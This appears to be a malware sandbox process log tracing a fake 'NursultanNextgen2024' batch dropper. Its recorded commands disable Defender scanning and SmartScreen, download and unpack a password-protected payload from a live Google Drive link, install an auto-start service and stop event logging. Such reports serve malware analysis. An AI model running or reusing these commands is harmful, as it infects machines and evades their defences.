- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,13199783108869734719,9169045042788733230,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6020 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,13199783108869734719,9169045042788733230,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:1
  2⤵
  PID:3784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,13199783108869734719,9169045042788733230,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1
  2⤵
  PID:1324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2060,13199783108869734719,9169045042788733230,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5752 /prefetch:8
  2⤵
  PID:4956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,13199783108869734719,9169045042788733230,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:1
  2⤵
  PID:4904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,13199783108869734719,9169045042788733230,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
  2⤵
  PID:3172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,13199783108869734719,9169045042788733230,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6368 /prefetch:1
  2⤵
  PID:4556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,13199783108869734719,9169045042788733230,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3984 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,13199783108869734719,9169045042788733230,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6168 /prefetch:2
  2⤵
  PID:5056

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2152

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3100

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3428

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat" "
1⤵
PID:1132
- C:\Windows\system32\chcp.com
  chcp.com 437
  2⤵
  PID:4608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type tmp
  2⤵
  PID:1432
- C:\Windows\system32\findstr.exe
  findstr /L /I set "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
  2⤵
  PID:5064
- C:\Windows\system32\findstr.exe
  findstr /L /I goto "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
  2⤵
  PID:436
- C:\Windows\system32\findstr.exe
  findstr /L /I echo "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
  2⤵
  PID:4232
- C:\Windows\system32\findstr.exe
  findstr /L /I pause "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
  2⤵
  PID:3216
- C:\Windows\system32\find.exe
  find
  2⤵
  PID:2244
- C:\Windows\system32\find.exe
  find
  2⤵
  PID:1440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type tmp
  2⤵
  PID:2324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "if ('C:\Users\Admin\Desktop\NursultanNextgen2024' -like '*temp*') { exit 1 } else { exit 0 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2328
- C:\Windows\system32\net.exe
  net session
  2⤵
  PID:4784
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:3216
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'; Add-MpPreference -ExclusionPath 'C:\ProgramData'; Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2288
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 0 /f
  2⤵
  PID:1796
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
  2⤵
  PID:4848
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1cOfdrYTcndJEY8uHrMnDtqUbkax07UMo&export=download', 'C:\Users\Admin\AppData\Local\Temp\support.rar')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3212
- C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe
  "C:\Users\Admin\Desktop\NursultanNextgen2024\rar\unrar.exe" x -p34nbGjnngjGn484ngn4nGng34GDG -o+ C:\Users\Admin\AppData\Local\Temp\support.rar C:\Users\Admin\AppData\Local\Temp\sf3g
  2⤵
  PID:1152
- C:\Users\Admin\AppData\Local\Temp\sf3g\drivers.exe
  "C:\Users\Admin\AppData\Local\Temp\sf3g\drivers.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:2716
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4752
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3248
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3248 -s 1096
      4⤵
      Program crash
      PID:4016
- C:\Users\Admin\AppData\Local\Temp\sf3g\installer.exe
  "C:\Users\Admin\AppData\Local\Temp\sf3g\installer.exe"
  2⤵
  - Executes dropped EXE
  PID:3016
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4136
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2716
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1672
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1048
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "GHKOKJMF"
    3⤵
    - Launches sc.exe
    PID:4232
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "GHKOKJMF" binpath= "C:\ProgramData\exsgytkvvovp\ayfvnajiment.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:4956
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:3308
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "GHKOKJMF"
    3⤵
    - Launches sc.exe
    PID:436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\sf3g\installer.exe"
    3⤵
    PID:4660
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 3
      4⤵
      PID:3436
- C:\Windows\system32\PING.EXE
  ping localhost -n 15
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:3948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3248 -ip 3248
1⤵
PID:5064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat" "
1⤵
PID:1580
- C:\Windows\system32\chcp.com
  chcp.com 437
  2⤵
  PID:3108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type tmp
  2⤵
  PID:3532
- C:\Windows\system32\findstr.exe
  findstr /L /I set "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
  2⤵
  PID:2944
- C:\Windows\system32\findstr.exe
  findstr /L /I goto "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
  2⤵
  PID:1672
- C:\Windows\system32\findstr.exe
  findstr /L /I echo "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
  2⤵
  PID:4752
- C:\Windows\system32\findstr.exe
  findstr /L /I pause "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
  2⤵
  PID:1600
- C:\Windows\system32\find.exe
  find
  2⤵
  PID:4120
- C:\Windows\system32\find.exe
  find
  2⤵
  PID:1644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type tmp
  2⤵
  PID:1436
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "if ('C:\Users\Admin\Desktop\NursultanNextgen2024' -like '*temp*') { exit 1 } else { exit 0 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:3212
- C:\Windows\system32\net.exe
  net session
  2⤵
  PID:1924
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:3308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'; Add-MpPreference -ExclusionPath 'C:\ProgramData'; Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:1556
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 0 /f
  2⤵
  PID:3936
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
  2⤵
  PID:4400
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1cOfdrYTcndJEY8uHrMnDtqUbkax07UMo&export=download', 'C:\Users\Admin\AppData\Local\Temp\support.rar')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4864
- C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe
  "C:\Users\Admin\Desktop\NursultanNextgen2024\rar\unrar.exe" x -p34nbGjnngjGn484ngn4nGng34GDG -o+ C:\Users\Admin\AppData\Local\Temp\support.rar C:\Users\Admin\AppData\Local\Temp\sf3g
  2⤵
  PID:3716
- C:\Users\Admin\AppData\Local\Temp\sf3g\drivers.exe
  "C:\Users\Admin\AppData\Local\Temp\sf3g\drivers.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:4652
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4300
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 1096
      4⤵
      Program crash
      PID:4400
- C:\Users\Admin\AppData\Local\Temp\sf3g\installer.exe
  "C:\Users\Admin\AppData\Local\Temp\sf3g\installer.exe"
  2⤵
  - Executes dropped EXE
  PID:1552
- C:\Windows\system32\PING.EXE
  ping localhost -n 15
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4300 -ip 4300
1⤵
PID:3776

C:\ProgramData\exsgytkvvovp\ayfvnajiment.exe
C:\ProgramData\exsgytkvvovp\ayfvnajiment.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3144
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1588
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3704
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1644
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4604
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:4888
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat" "
1⤵
PID:1008
- C:\Windows\system32\chcp.com
  chcp.com 437
  2⤵
  PID:2660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type tmp
  2⤵
  PID:2260
- C:\Windows\system32\findstr.exe
  findstr /L /I set "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
  2⤵
  PID:3776
- C:\Windows\system32\findstr.exe
  findstr /L /I goto "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
  2⤵
  PID:1588
- C:\Windows\system32\findstr.exe
  findstr /L /I echo "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
  2⤵
  PID:436
- C:\Windows\system32\findstr.exe
  findstr /L /I pause "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
  2⤵
  PID:4136
- C:\Windows\system32\find.exe
  find
  2⤵
  PID:1636
- C:\Windows\system32\find.exe
  find
  2⤵
  PID:1520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type tmp
  2⤵
  PID:1436
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "if ('C:\Users\Admin\Desktop\NursultanNextgen2024' -like '*temp*') { exit 1 } else { exit 0 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:3016
- C:\Windows\system32\net.exe
  net session
  2⤵
  PID:3748
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:1204
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'; Add-MpPreference -ExclusionPath 'C:\ProgramData'; Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:1132
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 0 /f
  2⤵
  PID:1680
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
  2⤵
  PID:888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1cOfdrYTcndJEY8uHrMnDtqUbkax07UMo&export=download', 'C:\Users\Admin\AppData\Local\Temp\support.rar')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4268
- C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe
  "C:\Users\Admin\Desktop\NursultanNextgen2024\rar\unrar.exe" x -p34nbGjnngjGn484ngn4nGng34GDG -o+ C:\Users\Admin\AppData\Local\Temp\support.rar C:\Users\Admin\AppData\Local\Temp\sf3g
  2⤵
  PID:1172
- C:\Users\Admin\AppData\Local\Temp\sf3g\drivers.exe
  "C:\Users\Admin\AppData\Local\Temp\sf3g\drivers.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:4944
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:860
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 1096
      4⤵
      Program crash
      PID:2480
- C:\Users\Admin\AppData\Local\Temp\sf3g\installer.exe
  "C:\Users\Admin\AppData\Local\Temp\sf3g\installer.exe"
  2⤵
  - Executes dropped EXE
  PID:1524
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2108
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:5024
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1008
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2688
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:180
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "GHKOKJMF"
    3⤵
    - Launches sc.exe
    PID:1948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\sf3g\installer.exe"
    3⤵
    PID:2540
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 3
      4⤵
      PID:3592
- C:\Windows\system32\PING.EXE
  ping localhost -n 15
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:5024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 860 -ip 860
1⤵
PID:4740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat" "
1⤵
PID:5064
- C:\Windows\system32\chcp.com
  chcp.com 437
  2⤵
  PID:4636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type tmp
  2⤵
  PID:1580
- C:\Windows\system32\findstr.exe
  findstr /L /I set "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
  2⤵
  PID:4356
- C:\Windows\system32\findstr.exe
  findstr /L /I goto "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
  2⤵
  PID:1572
- C:\Windows\system32\findstr.exe
  findstr /L /I echo "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
  2⤵
  PID:1484
- C:\Windows\system32\findstr.exe
  findstr /L /I pause "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
  2⤵
  PID:4340
- C:\Windows\system32\find.exe
  find
  2⤵
  PID:1820
- C:\Windows\system32\find.exe
  find
  2⤵
  PID:1016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type tmp
  2⤵
  PID:4608
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "if ('C:\Users\Admin\Desktop\NursultanNextgen2024' -like '*temp*') { exit 1 } else { exit 0 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4952
- C:\Windows\system32\net.exe
  net session
  2⤵
  PID:1132
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:4944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'; Add-MpPreference -ExclusionPath 'C:\ProgramData'; Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:1216
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 0 /f
  2⤵
  PID:4164
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
  2⤵
  PID:1968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1cOfdrYTcndJEY8uHrMnDtqUbkax07UMo&export=download', 'C:\Users\Admin\AppData\Local\Temp\support.rar')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:452
- C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe
  "C:\Users\Admin\Desktop\NursultanNextgen2024\rar\unrar.exe" x -p34nbGjnngjGn484ngn4nGng34GDG -o+ C:\Users\Admin\AppData\Local\Temp\support.rar C:\Users\Admin\AppData\Local\Temp\sf3g
  2⤵
  PID:4376
- C:\Users\Admin\AppData\Local\Temp\sf3g\drivers.exe
  "C:\Users\Admin\AppData\Local\Temp\sf3g\drivers.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:4636
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:944
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:860
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2676
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4108
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 1108
      4⤵
      Program crash
      PID:4016
- C:\Users\Admin\AppData\Local\Temp\sf3g\installer.exe
  "C:\Users\Admin\AppData\Local\Temp\sf3g\installer.exe"
  2⤵
  - Executes dropped EXE
  PID:1484
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1280
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2716
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3544
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:724
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:2584
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "GHKOKJMF"
    3⤵
    - Launches sc.exe
    PID:4100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\sf3g\installer.exe"
    3⤵
    PID:428
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 3
      4⤵
      PID:4336
- C:\Windows\system32\PING.EXE
  ping localhost -n 15
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:4156

C:\ProgramData\exsgytkvvovp\ayfvnajiment.exe
C:\ProgramData\exsgytkvvovp\ayfvnajiment.exe
1⤵
- Executes dropped EXE
PID:4164
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4620
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4344
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:688
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2928

